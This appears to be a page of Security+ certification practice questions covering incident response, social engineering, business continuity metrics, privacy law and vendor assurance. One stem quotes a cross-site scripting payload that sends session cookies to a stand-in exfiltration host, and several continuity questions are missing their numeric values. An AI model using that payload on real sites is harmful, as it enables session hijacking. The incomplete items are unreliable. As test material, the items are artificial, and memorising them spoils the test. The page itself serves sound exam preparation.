Tüm alıştırma soruları
2232 soru
An enterprise Security Operations Center (SOC) detects anomalous, high-volume outbound UDP port 53 traffic originating from an automated internal build server. Log inspection reveals structured base64-encoded strings appended to DNS queries sent to an external, unclassified domain, indicating active DNS tunneling and data exfiltration. Which TWO of the following actions should the incident response team perform FIRST to contain the threat while preserving evidence? (Select TWO.)
Geçerli olan tümünü seçin
An executive assistant receives a tailored email that appears to come directly from the company's Chief Executive Officer (CEO). The message insists on an urgent, confidential wire transfer to secure an enterprise acquisition before the end of the business day. Which of the following social engineering attack vectors best describes this incident?
A security analyst reviews a high-severity alert generated by a Network Intrusion Detection System (NIDS) monitoring enterprise perimeter web traffic. The SIEM correlation rule triggered on the following HTTP payload excerpt:
`GET /products/search?user_input=<script>window.location='http://malicious-exfil.com/collector?cookie='+document.cookie</script> HTTP/1.1`
The analyst logs the incident as a successful SQL injection attack attempting to query sensitive database tables. Which of the following best explains why the analyst's interpretation of this network alert is incorrect?
A security operations team is configuring an automated vulnerability management workflow for a hybrid cloud environment containing both ephemeral container workloads and legacy database servers. Which of the following scanning strategies should the team implement to minimize network overhead while ensuring accurate detection of OS-level vulnerabilities? (Select TWO.)
Geçerli olan tümünü seçin
A multinational retail enterprise headquartered in Texas processes online orders for customers residing across the European Union. During an operational risk assessment, the chief information security officer observes that customer transaction logs—which include payment details, IP addresses, and email addresses—are continuously replicated to a centralized data warehouse in Dallas. The IT infrastructure team asserts that encrypting the database at rest using AES-256 satisfies all legal security duties. However, the legal compliance team insists this control is insufficient for international data flows. Which of the following best describes the organization's legal compliance obligation regarding these data transfers?
An attacker leaves several USB flash drives labeled "Executive Compensation Q3" on tables in an enterprise cafeteria, relying on curious employees to pick one up and plug it into a corporate workstation. Which social engineering attack vector is being demonstrated in this scenario?
An enterprise finance company is onboarding a cloud payroll vendor and requires third-party assurance specifically regarding the vendor's internal controls over financial reporting. Which of the following reports should the enterprise request from the vendor?
During a business continuity strategy assessment, a hospital's IT security officer reviews the Business Impact Analysis (BIA) for the Electronic Health Record (EHR) system. The business impact analysis defines a Maximum Tolerable Downtime (MTD) of . Technical server restoration and database mounting are calculated to have a Recovery Time Objective (RTO) of . However, post-restoration operational steps—including data integrity validation, paper chart reconciliation, and system synchronization—require a Work Recovery Time (WRT) of . Which of the following operational conclusions should the security officer draw regarding the current disaster recovery plan?
An organization is conducting a Business Impact Analysis (BIA) and needs to define the maximum acceptable amount of time that a mission-critical system can remain offline following an outage. Which of the following business continuity metrics represents this duration?
A logistics enterprise is updating its business continuity management plan for its central warehouse execution system. A Business Impact Analysis (BIA) determines that data loss exceeding 15 minutes will cause unrecoverable state desynchronization across automated sorting units, while the system can remain completely offline for up to 6 hours before contract penalties take effect. The infrastructure team proposes a disaster recovery architecture utilizing asynchronous backup replication every 4 hours and an automated failover process that restores application availability within 2 hours. Which of the following statements correctly evaluates the proposed disaster recovery plan against the organization's business metrics?
To enforce strict endpoint security across a hybrid workforce, a security team is designing a host health validation strategy to enforce configuration baselines and patch management standards. Which of the following technical controls directly ensure that endpoints maintain verified baseline configurations and patch levels? (Select TWO.)
Geçerli olan tümünü seçin
A United States-based financial analytics organization expands its operations to process customer financial records and profile data belonging to residents of the European Union. The firm operates exclusively out of US data centers and does not hold corporate subsidiaries within the EU. Because the transfers do not fall under an overarching country-level adequacy decision for this entity, the security compliance officer must establish a valid legal transfer mechanism to remain compliant with data privacy mandates. Which of the following measures should the organization execute to lawfully authorize these international transfers of personal data?
An enterprise security team wants to evaluate the real-world behavioral impact of its security awareness training program rather than relying solely on compliance statistics. Which of the following metrics provides the best indicator that employees are actively applying security awareness principles to mitigate human risk?
An organization is evaluating risk treatment options for an aging internal document repository that contains non-sensitive archived data. Due to budget constraints, the Chief Information Security Officer (CISO) decides not to implement costly security upgrades. Instead, the organization purchases a cyber insurance policy covering potential breach liabilities for the system and signs an official memorandum documenting approval of the operational risks associated with continuing system operation without further technical modifications. Which of the following risk response strategies are being directly implemented in this scenario? (Select TWO.)
Geçerli olan tümünü seçin
A global logistics company completes a Business Impact Analysis (BIA) for its primary automated warehouse dispatch engine. The assessment reveals that to prevent irrecoverable inventory ledger corruption, data loss cannot exceed the last 15 minutes of queued transaction records preceding an outage. Furthermore, management specifies that while distribution centers can briefly operate on manual contingency protocols, the automated system must be fully restored and operational within 6 hours to prevent severe contractual SLA penalties. Which target metric configuration must the lead security architect establish to meet these operational requirements?
An airline's risk management team completes a Business Impact Analysis (BIA) for its automated crew scheduling engine. The BIA establishes that an operational disruption exceeding 8 hours will result in uncontrollable flight cancellations and severe regulatory penalties (Maximum Tolerable Downtime, MTD). After IT infrastructure restoration, technical staff require exactly 2 hours to perform database integrity checks and operational verification before handing the system back to operations (Work Recovery Time, WRT). Additionally, the business permits a maximum data loss window of 30 minutes of transaction logs. Which of the following represents the maximum Recovery Time Objective (RTO) that the IT recovery team must target to ensure compliance with the BIA?
An organization is categorizing its security controls based on CompTIA Security+ implementation categories (Technical, Managerial, Operational, Physical) and functional types (Preventive, Deterrent, Detective, Corrective, Compensating, Directive). Match each implemented security control on the left with its correct dual-classification on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
An enterprise infrastructure team is deploying an out-of-band Network Security Monitoring (NSM) sensor to monitor network perimeter traffic without introducing inline latency. Place the operational steps for establishing and validating this monitoring capability in the correct sequential order from initial network tap setup to final alert validation.
Öğeleri doğru sıraya koymak için sürükleyin
An e-commerce organization is evaluating a third-party cloud analytics vendor that will handle non-financial telemetry and user interaction data. Prior to onboarding, the organization's compliance lead asks for a SOC 2 Type II attestation report. Which of the following statements correctly describe the scope and characteristics of a SOC 2 Type II report? (Select TWO.)
Geçerli olan tümünü seçin
A security analyst is designing a vulnerability assessment strategy for an enterprise environment that includes both ephemeral cloud virtual machines that dynamically auto-scale and legacy operational technology (OT) controllers that are susceptible to crashing under heavy active network traffic. Which deployment model best provides comprehensive vulnerability visibility while minimizing operational risk and disruption across both asset types?